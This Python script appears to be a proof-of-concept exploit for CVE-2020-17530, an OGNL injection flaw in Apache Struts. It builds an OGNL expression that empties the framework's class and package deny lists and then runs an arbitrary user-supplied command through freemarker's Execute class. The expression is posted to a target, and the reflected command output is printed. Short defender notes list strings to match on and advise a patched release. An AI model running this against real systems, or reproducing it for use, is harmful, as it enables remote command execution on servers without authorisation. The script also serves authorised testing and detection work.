CVE-2020-17530.py
#!/usr/bin/env python
import argparse
import requests
from bs4 import BeautifulSoup
def build_payload(command):
    """Return the OGNL expression this proof of concept submits for CVE-2020-17530.

    The result is a fixed template with *command* spliced in, unescaped,
    between double quotes as the single element of the argument list that the
    expression hands to ``freemarker.template.utility.Execute``.

    Defender notes: the literal class names in the template
    (``org.apache.tomcat.InstanceManager``,
    ``org.apache.commons.collections.BeanMap``,
    ``freemarker.template.utility.Execute``) and the ``excludedClasses`` /
    ``excludedPackageNames`` keys are stable strings to match on in request
    bodies and multipart form fields. The durable fix is to run a Struts
    release that the vendor advisory for this CVE lists as fixed.
    """
    # Everything up to the opening quote of the command argument.
    prefix = (
        '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"])'
        '.(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"])'
        '.(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap"))'
        '.(#bean.setBean(#stack))'
        '.(#context=#bean.get("context"))'
        '.(#bean.setBean(#context))'
        '.(#macc=#bean.get("memberAccess"))'
        '.(#bean.setBean(#macc))'
        '.(#emptyset=#instancemanager.newInstance("java.util.HashSet"))'
        '.(#bean.put("excludedClasses",#emptyset))'
        '.(#bean.put("excludedPackageNames",#emptyset))'
        '.(#arglist=#instancemanager.newInstance("java.util.ArrayList"))'
        '.(#arglist.add("'
    )
    # Closing quote of the command argument through the end of the expression.
    suffix = (
        '"))'
        '.(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute"))'
        '.(#execute.exec(#arglist))}'
    )
    return prefix + command + suffix
def get_parser():
    """Build the command-line parser for this proof-of-concept script.

    Options (all optional):
        -c/--command  string placed into the expression (default ``whoami``)
        -n/--name     multipart form field name, also the attribute read back
                      from the response (default ``id``)
        -p/--port     TCP port as an int (default 80)
        -t/--target   host name or address (default ``localhost``)
        -u/--uri      request path (default ``/``)

    Returns:
        The configured ``argparse.ArgumentParser``.
    """
    # (short flag, long flag, help text, default, type) per option, in the
    # order they should appear in --help.
    option_specs = (
        ('-c', '--command', 'command', 'whoami', str),
        ('-n', '--name', 'form data name', 'id', str),
        ('-p', '--port', 'port', 80, int),
        ('-t', '--target', 'target', 'localhost', str),
        ('-u', '--uri', 'uri', '/', str),
    )
    cli = argparse.ArgumentParser()
    for short_flag, long_flag, help_text, default_value, value_type in option_specs:
        cli.add_argument(
            short_flag,
            long_flag,
            help=help_text,
            default=default_value,
            type=value_type,
        )
    return cli
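def main():
    """Send one multipart POST carrying the test expression and print the reflected value.

    The URL scheme is derived from the port only: 80 gives ``http://target``,
    443 gives ``https://target``, and any other port gives
    ``http://target:port``. A leading ``/`` is added to the URI when missing.

    The response is parsed as HTML, and the value of the attribute named by
    ``--name`` on the first ``<a>`` element is printed. If that element or
    attribute is absent, a short message is printed instead of a traceback.
    Absence means only that no evaluated output came back in that position.
    """
    args = get_parser().parse_args()
    command, name, port, target, uri = (
        args.command, args.name, args.port, args.target, args.uri
    )

    if port == 80:
        base_url = f'http://{target}'
    elif port == 443:
        base_url = f'https://{target}'
    else:
        base_url = f'http://{target}:{port}'

    if not uri.startswith('/'):
        uri = '/' + uri

    try:
        # (None, value) makes requests send a plain form field, not a file
        # upload. The timeout keeps an unresponsive host from blocking the
        # script forever; Timeout is a RequestException and is handled below.
        r = requests.post(
            base_url + uri,
            files={name: (None, build_payload(command))},
            timeout=10,
        )
    except requests.exceptions.RequestException as e:
        print(e)
        return

    soup = BeautifulSoup(r.text, 'html.parser')
    anchor = soup.find('a')
    # find() returns None when the page has no <a>, and the attribute may be
    # missing; both previously surfaced as AttributeError/KeyError tracebacks.
    value = anchor.attrs.get(name) if anchor is not None else None
    if value is None:
        print(f"No <a> element with a '{name}' attribute in the response "
              f"(HTTP {r.status_code}); no evaluated output was reflected.")
        return
    # BeautifulSoup returns a list for multi-valued attributes such as class.
    if isinstance(value, list):
        value = ' '.join(value)
    print(value.strip())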
# Run the request only when executed as a script, so importing this module
# (for example to inspect build_payload) performs no network activity.
if __name__ == "__main__":
    main()